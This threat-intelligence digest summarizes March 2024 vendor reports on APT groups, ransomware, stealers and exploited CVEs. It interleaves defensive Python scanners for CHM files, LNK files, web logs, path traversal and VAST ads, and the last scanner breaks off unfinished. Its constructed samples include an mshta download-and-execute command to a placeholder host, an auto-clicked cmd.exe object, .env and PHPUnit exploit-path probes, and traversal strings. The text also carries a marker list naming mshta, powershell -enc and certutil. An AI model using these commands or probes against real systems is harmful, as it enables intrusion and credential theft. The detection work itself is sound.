- The Talos newsletter discusses the evolution of social engineering tactics, specifically “catfishing” or “romance scams,” in which scammers build relationships with targets in order to eventually scam them out of money. It explains the process and the differences between “pig butchering” and traditional romance scams, emphasizing the importance of user education and law enforcement involvement. It then turns to Talos’ research on the Turla APT and its new tool, TinyTurla-NG, used to target Polish NGOs and steal sensitive data, mentions Talos’ detection content for Cisco Secure products, and rounds up the top security headlines of the week.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-march-21-2024/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Government_Hacker_Using_ScreenConnect_and_F5_Bugs_to_Attack_Defense_and_Government_Entities
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- A threat actor allegedly connected to the People’s Republic of China has been exploiting two widely exploited vulnerabilities, in ConnectWise ScreenConnect and F5 products, to attack U.S. defense contractors, U.K. government entities and institutions in Asia.
Source:
https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect
—
- Intel Source:
- Recorded Future
- Intel Name:
- Numerous_Chinese_State_Sponsored_Groups_Are_Associated_With_Private_Contractor
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- Recorded Future’s Insikt Group provides a fresh perspective on the i-SOON leak. On February 18, 2024, an anonymous leak of documents from Anxun Information Technology Co., Ltd. (i-SOON), a Chinese cybersecurity and IT company, exposed details of China’s state-sponsored cyber espionage operations. The leak is notable because it shows links between i-SOON and several Chinese state-sponsored groups, including RedAlpha, RedHotel and POISON CARP. These connections point to a complex web of espionage activity, including the theft of communications records in order to track down specific individuals.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2024-0320.pdf
—
- Intel Source:
- ASEC
- Intel Name:
- Caution_Regarding_Infostealer_Posing_as_Installer
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- Researchers from ASEC have observed widespread distribution of the StealC malware disguised as an installer, downloaded through Dropbox, GitHub, Discord and other services. Based on earlier incidents using similar distribution paths, victims are likely redirected several times from a malicious webpage posing as a download page for a specific program before reaching the actual download URL.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- AceCryptor_Malware_Increased_Throughout_Europe
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- ESET researchers have tracked AceCryptor for years and say the latest campaign differs from earlier ones in the broader set of malicious payloads the attackers deliver with it. AceCryptor is typically used to pack Remcos (also known as Rescoms), a powerful remote surveillance tool that researchers have frequently observed being used against Ukrainian businesses.
Source:
https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_Kimsuky_threat_actor_group_activity
- Date of Scan:
- 2024-03-21
- Impact:
- MEDIUM
- Summary:
- The article discusses the latest tactics and techniques used by the Kimsuky threat actor group, also known as Black Banshee or Thallium. The North Korean group focuses primarily on intelligence gathering and has targeted South Korean government entities, individuals involved in the Korean peninsula’s unification process, and global experts in fields relevant to the regime’s interests. The report highlights the group’s evolving methods, such as using weaponized Office documents, ISO files and shortcut (LNK) files to bypass modern security measures, and reveals that the group is now using CHM (compiled HTML help) files to distribute malware and gain access to its targets. It provides a detailed analysis of a CHM file used by the group, including its file structure, language and code snippets, and explains how the group uses HTML and ActiveX to execute arbitrary commands on a victim’s machine and establish persistence. The article also includes a visualization of the attack flow and a list of detections that Rapid7 customers can use against this campaign.
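The ActiveX mechanism the report describes can be checked for mechanically once a CHM has been decompiled. The script below is an added example, not code from the Rapid7 writeup: it parses the HTML pages of a decompiled CHM, finds OBJECT elements that instantiate the HTML Help control with Command=ShortCut, extracts the program and arguments from the Item1 parameter, and reports whether page script auto-clicks the object so that no user interaction is needed. The CLSID and the Item1 layout are taken from the HTML Help control’s documentation, not from this page, and SAMPLE_HTML is constructed.

```python
"""Scan decompiled CHM HTML for the HTML Help ActiveX "ShortCut" object.

Added example, not code from the Rapid7 writeup. It assumes the CHM has already
been decompiled to its HTML pages (hh.exe -decompile or 7-Zip). The CLSID is the
one hhctrl.ocx registers for the HTML Help control, and the Item1 layout
("window title,program,arguments") is the control's documented ShortCut format;
neither comes from this page. SAMPLE_HTML is constructed.
"""
import re
from html.parser import HTMLParser

HH_CTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"


class _ObjectCollector(HTMLParser):
    """Collect every <OBJECT> together with its <PARAM name=... value=...> children."""

    def __init__(self):
        super().__init__()
        self.objects = []      # [{"id": str, "classid": str, "params": {name: value}}]
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"id": attrs.get("id", ""),
                             "classid": attrs.get("classid", "").lower(),
                             "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None


def find_shortcut_commands(html):
    """Return the program and arguments each HH ShortCut object would launch."""
    parser = _ObjectCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for obj in parser.objects:
        if HH_CTRL_CLSID not in obj["classid"]:
            continue
        params = obj["params"]
        if params.get("command", "").lower() != "shortcut":
            continue
        parts = params.get("item1", "").split(",", 2)   # title,program,arguments
        hits.append({
            "object_id": obj["id"],
            "program": parts[1].strip() if len(parts) > 1 else "",
            "arguments": parts[2].strip() if len(parts) > 2 else "",
        })
    return hits


def auto_click_ids(html):
    """Object ids that page script clicks itself, i.e. execution without user action."""
    return re.findall(r"\b([A-Za-z_]\w*)\.Click\s*\(\s*\)", html)


# Constructed sample page in the shape a ShortCut-abusing CHM topic takes.
SAMPLE_HTML = """<html><body>
<OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c echo constructed-sample">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
</body></html>"""

if __name__ == "__main__":
    clicked = auto_click_ids(SAMPLE_HTML)
    for hit in find_shortcut_commands(SAMPLE_HTML):
        print(f"{hit['program']} {hit['arguments']}  (auto-clicked: {hit['object_id'] in clicked})")
```

Run it over every .htm/.html extracted from the CHM; a ShortCut object whose id is also auto-clicked is the pattern to escalate, since the command runs as soon as the help topic renders.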
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Investigations_into_CVE_2024_21762_Vulnerability_and_Fortinet_FortiOS
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- ISC.SANS researchers note that an exploit for CVE-2024-21762, a vulnerability in Fortinet’s FortiOS, has been published on GitHub. Fortinet released a patch on February 8th, so device owners had more than a month to apply it. A few days before appearing on GitHub, the exploit circulated on the Chinese QQ messaging network.
Source:
https://isc.sans.edu/diary/Scans+for+Fortinet+FortiOS+and+the+CVE202421762+vulnerability/30762/
—
- Intel Source:
- Sucuri
- Intel Name:
- Sign1_malware_analysis
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- The article “Sign1 Malware: Analysis, Campaign History & Indicators of Compromise” details a malware campaign known as Sign1, which has affected over 39,000 websites in the past six months and is typically injected through custom HTML widgets. The injected JavaScript redirects visitors to malicious sites, often connected to the VexTrio scam operation. The analysis traces the campaign’s evolution since it was first noticed in 2023: the attackers have changed their obfuscation methods and use a timestamp trick to dynamically generate the redirect URLs, and the script only executes when specific conditions are met, including the presence of a particular cookie and the correct referrer. The article lists the domains used by the attackers with their registration dates and the number of infected sites per domain, breaks down the JavaScript code, includes a case study of a client whose infection was traced back to the campaign, and provides indicators of compromise. The author recommends securing the admin panel and using website monitoring tools to detect and mitigate this type of infection.
—
- Intel Source:
- Imperva
- Intel Name:
- New_Sysrv_botnet_variant_spreads_XMRig_Miner
- Date of Scan:
- 2024-03-21
- Impact:
- MEDIUM
- Summary:
- A new variant of the Sysrv botnet was observed exploiting vulnerabilities in Apache Struts and Atlassian Confluence to spread an XMRig cryptominer payload. The malware used a compromised Malaysian academic website and a Google subdomain to distribute its files. Enhancements include obfuscation and architecture-preparation functions. The miner connects to MoneroOcean mining-pool endpoints and mines to a specific wallet. Defenders should block suspicious outbound connections and inspect seemingly legitimate sites for malicious files.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Exploits_For_TeamCity_Vulnerabilities_Lead_to_Jasmin_Ransomware
- Date of Scan:
- 2024-03-20
- Impact:
- LOW
- Summary:
- Active exploitation of vulnerabilities in TeamCity On-Premises poses a serious risk to enterprises that use the platform for their CI/CD pipelines. According to Trend Micro telemetry, threat actors are using these vulnerabilities to deploy ransomware, coinminers and backdoor payloads on compromised TeamCity servers.
—
- Intel Source:
- Juniper
- Intel Name:
- Androxgh0st_malware_targets_networks
- Date of Scan:
- 2024-03-20
- Impact:
- MEDIUM
- Summary:
- The article discusses the importance of patch management and network security measures in defending networks, focusing on the Androxgh0st malware, which targets Laravel applications and exploits vulnerabilities such as CVE-2017-9841 and CVE-2018-15133. It provides a technical analysis of the malware and its exploitation methods, along with defenses such as encrypting sensitive information and using multi-factor authentication, and highlights Juniper IDS and ATP Cloud as proactive defenses against Androxgh0st and other attacks. It also covers the abuse of SMTP, AWS, SendGrid and Twilio credentials and the risk of data breaches through exposed .env files, and concludes by stressing regular updating and patching of systems and strong security controls to prevent unauthorized access.
Source:
https://blogs.juniper.net/en-us/security/shielding-networks-against-androxgh0st
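Androxgh0st’s .env harvesting and its use of CVE-2017-9841 both leave a distinctive trail in web server access logs. The scanner below is an added example, not Juniper’s detection content: it parses combined-format log lines and summarizes, per source address, which probes were seen and whether a .env request actually succeeded. The PHPUnit eval-stdin.php path is the one named in the public advisory for CVE-2017-9841, not something this page states, and the log lines and RFC 5737 addresses are constructed.

```python
"""Surface Androxgh0st-style probing in web server access logs.

Added example, not Juniper's detection content. It parses combined/common log
lines and reports, per source IP, requests for secrets or exploit endpoints:
/.env in any directory (plus .env.* variants) and the PHPUnit eval-stdin.php
path associated with CVE-2017-9841. That path comes from the public advisory
for the CVE, not from this page; the log lines and RFC 5737 addresses below are
constructed.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')

PROBE_PATTERNS = [
    ("env_file", re.compile(r"(^|/)\.env(\.\w+)?(\?|$)", re.I)),
    ("phpunit_eval_stdin",
     re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
]


def classify(path):
    """Names of the probe patterns a request path matches (empty for benign paths)."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(path)]


def _new_entry():
    return {"requests": 0, "probes": set(), "paths": set(), "exposed": set()}


def scan(log_text):
    """Per-IP summary of probe requests; 'exposed' lists .env paths that returned 200."""
    report = defaultdict(_new_entry)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify(m["path"])
        if not names:
            continue
        entry = report[m["ip"]]
        entry["requests"] += 1
        entry["probes"].update(names)
        entry["paths"].add(m["path"])
        if "env_file" in names and m["status"] == "200":
            entry["exposed"].add(m["path"])       # the server actually served a .env
    return dict(report)


# Constructed log excerpt: one scanner, one ordinary visitor with a look-alike path.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2024:10:01:02 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Mar/2024:10:01:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Mar/2024:10:01:04 +0000] "GET /admin/.env HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [20/Mar/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [20/Mar/2024:10:05:01 +0000] "GET /.environment-info HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, entry["requests"], sorted(entry["probes"]), sorted(entry["exposed"]))
```

A 200 on a .env path is the finding that matters: every credential in that file (the SMTP, AWS, SendGrid and Twilio keys the article mentions) should be treated as compromised and rotated, and the web server configured to refuse dotfiles.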
—
- Intel Source:
- SentinelLabs
- Intel Name:
- New_AcidPour_Data_Wiper_Targeting_Linux_x86_Network_Devices
- Date of Scan:
- 2024-03-20
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered AcidPour, a new destructive malware with data-wiping functionality that targets Linux x86 networking and Internet of Things devices. Although AcidPour and AcidRain target similar directories and device paths found in embedded Linux distributions, the estimated overlap between their codebases is only about 30%.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Revival_of_a_Notorious_Ransomware_Threat
- Date of Scan:
- 2024-03-19
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has observed the resurgence of CryptoWire, a ransomware strain that wreaked havoc back in 2018. Written in AutoIt and distributed primarily through phishing emails, CryptoWire self-replicates, explores the network for files to encrypt and deletes data to hinder recovery. Unlike most ransomware, CryptoWire exposes its decryption keys, either embedded in the malware or transmitted to the threat actor’s server. Users are urged to exercise caution, use anti-malware solutions and keep systems up to date to prevent infection and data loss.
—
- Intel Source:
- ASEC
- Intel Name:
- Persistent_Cyber_Threats_Targeting_Korean_Corporations
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- AhnLab Security Intelligence Center (ASEC) has uncovered a series of ongoing attacks by the Andariel group against Korean companies. Notably, the group installs MeshAgent alongside other remote management tools to gain a range of remote-control capabilities. Abusing Korean asset-management solutions, it installs malware such as AndarLoader and ModeLoader during lateral movement. AndarLoader is a downloader that retrieves executable data such as .NET assemblies from C&C servers; MeshAgent is a remote-management tool that enables screen control, observed in use by Andariel for the first time; and ModeLoader is JavaScript malware fetched from an external server and executed via Mshta.
—
- Intel Source:
- Docguard
- Intel Name:
- Analysis_of_AutoIt_Malware
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- This article walks through the static analysis and AutoIt deobfuscation of an LNK-based malware sample. It examines the important fields of the LNK file and identifies a malicious command that downloads and executes an HTA file from a remote server. The HTA file, downloaded manually and analyzed, uses forfiles.exe and PowerShell. The analysis also uncovers an embedded ZIP file, which is extracted and examined; a script parses the AutoIt variables and removes the unnecessary ones, and a list of IOCs for this specific sample is provided.
Source:
https://www.docguard.io/analysis-of-lnk-based-obfuscated-autoit-malware/
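The LNK fields the article examines can be pulled out with a small parser; the one below is an added example, not the Docguard tooling. It implements enough of the [MS-SHLLINK] layout to walk past the header, LinkTargetIDList and LinkInfo blocks and read the StringData fields, then runs a few analyst heuristics over the arguments. The sample LNK is built in the block itself, and the HTA URL in it (example.invalid) is a placeholder rather than a real campaign artifact.

```python
"""Minimal parser for Windows Shell Link (.lnk) files that pulls out the fields
an analyst triages first, above all the command-line arguments.

Added example, not the tooling from the Docguard writeup. It follows the
[MS-SHLLINK] layout: a 76-byte ShellLinkHeader, optional LinkTargetIDList and
LinkInfo blocks, then StringData in the order name, relative path, working
directory, arguments, icon location. ExtraData blocks after StringData are not
parsed. The sample LNK is constructed by build_sample_lnk(); its command and
the example.invalid URL are placeholders, not a real campaign artifact.
"""
import struct

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} as it is laid out on disk
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

# Substrings worth a closer look when they appear in LNK arguments
# (analyst heuristics added here; not a list from the writeup).
SUSPICIOUS_ARG_MARKERS = ("mshta", "http://", "https://", "powershell", "-enc",
                          "forfiles", "certutil", "/c ")


def is_lnk(data):
    return (len(data) >= HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == HEADER_SIZE
            and data[4:20] == LINK_CLSID)


def parse_lnk(data):
    """Return the header flags and the StringData fields (None when absent)."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize + IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        size, = struct.unpack_from("<I", data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    result = {"flags": flags}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            result[field] = None
            continue
        count, = struct.unpack_from("<H", data, off)   # CountCharacters, no NUL
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        result[field] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return result


def triage(parsed):
    """Markers from SUSPICIOUS_ARG_MARKERS found in the arguments field."""
    args = (parsed.get("arguments") or "").lower()
    return [m for m in SUSPICIOUS_ARG_MARKERS if m in args]


def build_sample_lnk(relative_path, working_dir, arguments):
    """Construct a minimal Unicode LNK with no IDList/LinkInfo (sample input)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,            # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,         # creation/access/write time
                         0, 0, 1,         # file size, icon index, SW_SHOWNORMAL
                         0, 0, 0, 0)      # hotkey, reserved1..3
    body = b""
    for s in (relative_path, working_dir, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


SAMPLE_LNK = build_sample_lnk(
    "..\\..\\Windows\\System32\\cmd.exe",
    "C:\\Windows\\System32",
    "/c mshta http://example.invalid/constructed-placeholder.hta",
)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    for field, _ in STRING_FIELDS:
        print(f"{field:14s} {info[field]!r}")
    print("triage:", triage(info))
```

Real samples usually carry a LinkTargetIDList and ExtraData blocks (environment variables, property stores) that this parser skips or ignores; the arguments string is where the download-and-execute command described above lives, so it is the first field to read.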
—
- Intel Source:
- Perception Point
- Intel Name:
- A_New_Phishing_Attack_That_Deploys_NetSupport_RAT
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- Researchers at Perception Point have discovered a new spear-phishing campaign, dubbed Operation PhantomBlu, aimed at US organizations with the goal of installing the NetSupport RAT remote access trojan. PhantomBlu uses OLE (Object Linking and Embedding) template manipulation to execute malicious code while evading detection, a sophisticated technique that departs from the usual NetSupport RAT delivery methods.
—
- Intel Source:
- Shadowstackre
- Intel Name:
- A_new_ransomware_gang_called_Donex
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- The ShadowStackRE post “Donex a new ransomware gang” analyzes the ransomware used by a new group called Donex, covering its pre-encryption setup, file and directory discovery, and encryption process. Setup involves creating a mutex, disabling file system redirection and obtaining a cryptographic context. File and directory discovery runs across multiple threads and targets specific processes for shutdown. Encryption uses the Windows Restart Manager API and Salsa20/ChaCha20 to encrypt data, and the encryptor’s configuration includes a blacklist, a whitelist and a list of target extensions. The post concludes with the cleanup process, which clears event logs and restarts the system.
—
- Intel Source:
- Russian Panda
- Intel Name:
- The_GlorySprout_stealer_and_others
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- A new information stealer named GlorySprout surfaced in cybercrime forums in March 2024. Technical analysis shows it is likely a clone of the older Taurus stealer, sharing code similarities but lacking some features like Anti-VM. GlorySprout is unlikely to gain popularity compared to other stealers.
Source:
https://russianpanda.com/2024/03/16/The-GlorySprout-Stealer-or-a-Failed-Clone-of-Taurus-Stealer/
—
- Intel Source:
- Fortinet
- Intel Name:
- RA_World_Ransomware_continued_activity
- Date of Scan:
- 2024-03-19
- Impact:
- MEDIUM
- Summary:
- The blog provides an overview of RA World ransomware, which encrypts files and exfiltrates data, then demands a ransom both for decryption and for not leaking the stolen files. It disables backups and deletes shadow copies to prevent recovery, appends the .RAWLD extension to encrypted files and drops a ransom note with contact information. The group operates both Tor and clearnet sites to publish stolen data. The post covers infection vectors, victims, attack methods, protections and mitigations.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-ra-world
—
- Intel Source:
- IBM X-Force
- Intel Name:
- Hackers_From_APT28_Targeting_Europe_America_Asia_in_Widespread_Phishing_Scheme
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- IBM X-Force researchers have found the Russia-linked threat actor APT28 conducting several active phishing campaigns that use lure documents impersonating government and non-governmental organizations (NGOs) across North and South America, Europe, the South Caucasus, Central Asia and Asia. The lures are a mix of internal and publicly available documents, plus possibly actor-generated documents, covering finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business and defense industrial production.
Source:
https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Malicious_Attacks_on_Global_Government_Institutions
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers have identified a threat actor, tracked as Earth Krahang, targeting government institutions worldwide. The group abuses compromised government infrastructure and uses two distinct malware families in its attacks. The analysis, drawn from telemetry data and files exposed on the group’s servers, also highlights the broad range of its targets and malicious activities.
Source:
https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Find_Vulnerable_Networks_by_Using_the_Aiohttp_Bug
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- Researchers at Cyble have observed the ransomware actor “ShadowSyndicate” scanning for servers that may be affected by CVE-2024-23334, a directory traversal vulnerability in the aiohttp Python library. aiohttp is an open-source library built on Python’s asyncio framework for handling large numbers of concurrent HTTP requests without conventional thread-based networking.
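The check that a directory-traversal bug in a static file handler gets wrong is containment: the resolved file must stay inside the document root after decoding, normalization and symlink resolution. The block below is an added example, not aiohttp’s code and not a description of its patch; it implements that check and exercises it against constructed requests. The fixed aiohttp release is stated in the project’s advisory rather than on this page, so upgrading to it remains the actual remediation.

```python
"""Resolve a requested static-file path against a document root and refuse
anything that escapes it, whether through "..", percent-encoding or a symlink.

Added example, not aiohttp's code. It shows the containment check a static
file handler needs and that a directory-traversal bug of the kind described
for aiohttp gets wrong; the fixed aiohttp release is listed in the project's
advisory, not on this page. The document tree is constructed in a temporary
directory (POSIX symlinks assumed) so the demo runs offline.
"""
import os
import tempfile
from urllib.parse import unquote


class TraversalError(Exception):
    pass


def _inside(path, root):
    return path == root or path.startswith(root + os.sep)


def resolve_static(root, request_path):
    """Return the real file path for request_path, or raise TraversalError."""
    root_real = os.path.realpath(root)
    rel = unquote(request_path)                    # decode %2e%2e, %2f, ...
    if "\x00" in rel:
        raise TraversalError("NUL byte in path")
    rel = rel.replace("\\", "/").lstrip("/")
    candidate = os.path.normpath(os.path.join(root_real, rel))
    if not _inside(candidate, root_real):          # lexical escape via ".."
        raise TraversalError(f"path escapes root: {request_path!r}")
    resolved = os.path.realpath(candidate)
    if not _inside(resolved, root_real):           # escape via a symlink inside root
        raise TraversalError(f"symlink escapes root: {request_path!r} -> {resolved}")
    if not os.path.isfile(resolved):
        raise FileNotFoundError(request_path)
    return resolved


def probe(root, request_paths):
    """Map each request path to 'served', 'blocked' or 'missing'."""
    outcome = {}
    for p in request_paths:
        try:
            resolve_static(root, p)
            outcome[p] = "served"
        except TraversalError:
            outcome[p] = "blocked"
        except FileNotFoundError:
            outcome[p] = "missing"
    return outcome


def build_sample_tree():
    """Constructed root with one page and a symlink that points outside the root."""
    base = tempfile.mkdtemp(prefix="static-demo-")
    root = os.path.join(base, "www")
    os.makedirs(root)
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>constructed sample</h1>")
    secret = os.path.join(base, "secret.txt")
    with open(secret, "w") as f:
        f.write("outside the document root")
    os.symlink(secret, os.path.join(root, "leak"))
    return root, secret


SAMPLE_REQUESTS = ["/index.html", "/../secret.txt", "/%2e%2e/secret.txt",
                   "/..%2fsecret.txt", "/leak", "/nope.txt"]

if __name__ == "__main__":
    root, _ = build_sample_tree()
    for path, outcome in probe(root, SAMPLE_REQUESTS).items():
        print(f"{outcome:8s} {path}")
```

The two containment checks are deliberately separate: the lexical one stops ".." before any filesystem access, and the realpath one catches the case a lexical check cannot see, a symlink under the root that points outside it. Percent-decoding is done once, before normalization, so encoded traversal sequences are judged on what the filesystem would actually see.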
—
- Intel Source:
- Hunt.IO
- Intel Name:
- Open_Directory_Exposes_Phishing_Campaign_Targeting_Google_And_Naver_Credentials
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Hunt.IO researchers have observed an ongoing phishing campaign by a possible North Korean threat actor aiming to steal Google and Naver login credentials. Besides numerous fake Google and Naver pages, the open directory that led to the finding also contains a sample of the open-source Xeno-RAT malware and KakaoTalk chat transcripts between unidentified people discussing cryptocurrency trading.
—
- Intel Source:
- Netskope
- Intel Name:
- An_Intimidating_Azorult_Campaign_Operated_Via_Google_Sites
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- Researchers at Netskope have observed an evasive Azorult campaign that uses a range of defense-evasion techniques, from delivery through execution, to steal sensitive information without attracting defenders’ attention. This infostealer, first identified in 2016, can steal private data such as browser history, cryptocurrency wallet data and user credentials.
—
- Intel Source:
- Uptycs
- Intel Name:
- Mac_malware_analysis_using_osquery
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- This article discusses the use of osquery, an operating system instrumentation framework, for analyzing malware on macOS systems. It describes how malware can use commands like chown and chmod to gain control and persistence on a system. The article also provides a detailed overview of using osquery for malware analysis, including a comparison with sandboxing solutions and a step-by-step guide for analyzing a specific malware, OSX/Dummy. It concludes by highlighting the benefits of using osquery for dynamic malware analysis on macOS and Linux systems.
Source:
https://www.uptycs.com/blog/malware-analysis-using-osquery
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- Examining_Latest_DEEP_GOSU_Attack_Campaign
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have been tracking a new campaign, identified as DEEP#GOSU, that appears to be connected to the Kimsuky group and includes both recycled and newly created code and stagers. Although Kimsuky has previously targeted South Korean victims, the observed tradecraft shows the group has switched to a new script-based attack chain that uses multiple PowerShell and VBScript stagers to infect systems covertly. Later-stage scripts let the attackers monitor keystrokes, the clipboard and other session activity.
—
- Intel Source:
- Any.Run
- Intel Name:
- ObserverStealer_Story_Continues_with_AsukaStealer
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- AsukaStealer and ObserverStealer are fundamentally similar: both use XOR encryption and the same style of C2 communication. AsukaStealer differs in dropping the external DLL dependencies for data parsing and decryption in favor of server-side processing, which increases stealth and reduces its footprint on the host. The rebranding of ObserverStealer under a new name is thought to be driven by the developers’ intent to improve the stealer in response to earlier criticism and negative user feedback.
Source:
https://any.run/cybersecurity-blog/asukastealer-malware-analysis/#appendix-1-iocs-7288
—
- Intel Source:
- Geoedge
- Intel Name:
- ScamClub_Malicious_VAST_Attack
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- A recent report details how a threat actor known as ScamClub has shifted to using video malvertising and VAST ads to distribute financial scams. The report analyzes ScamClub’s tactics, which involve exploiting the VAST protocol to embed malicious code in video ads that fingerprint users and redirect them to scam pages. The report highlights how ScamClub has infiltrated numerous ad platforms to reach a broad audience, with a focus on mobile users. It outlines the technical details of the attack flow, from crafting the malicious script to employing obfuscation techniques and evading detection. The report underscores the need for constant scanning of video assets to safeguard inventory and protect audiences.
Source:
https://www.geoedge.com/decoding-scamclubs-malicious-vast-attack
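Scanning video assets, as the report recommends, starts with finding where a VAST document can carry code at all. The block below is an added example, not GeoEdge’s scanner: it enumerates VPAID media files, verification JavaScriptResource entries and script-bearing Extension blocks, and flags any resource served from a host outside an operator allowlist. The sample VAST, its example.invalid hosts and the allowlist are constructed.

```python
"""Enumerate script-bearing resources in a VAST document and flag any whose
host is not an approved vendor.

Added example, not GeoEdge's scanner. It inspects the places where VAST lets a
creative carry executable code: VPAID MediaFiles (apiFramework="VPAID" or a
JavaScript MIME type), JavaScriptResource elements under AdVerifications, and
Extension blocks that embed script. The sample VAST, its example.invalid hosts
and the allowlist are constructed assumptions.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse


def _text(el):
    return (el.text or "").strip()


def script_resources(vast_xml):
    """Return [{"ad", "kind", "url"}] for every executable resource in the VAST."""
    root = ET.fromstring(vast_xml)
    found = []
    for ad in root.iter("Ad"):
        ad_id = ad.get("id", "")
        for mf in ad.iter("MediaFile"):
            api = (mf.get("apiFramework") or "").upper()
            mime = (mf.get("type") or "").lower()
            if api == "VPAID" or "javascript" in mime:
                found.append({"ad": ad_id, "kind": "vpaid_mediafile", "url": _text(mf)})
        for js in ad.iter("JavaScriptResource"):
            found.append({"ad": ad_id, "kind": "verification_script", "url": _text(js)})
        for ext in ad.iter("Extension"):
            blob = ET.tostring(ext, encoding="unicode").lower()
            if "<script" in blob or "&lt;script" in blob:   # child element or CDATA
                found.append({"ad": ad_id, "kind": "extension_script", "url": ""})
    return found


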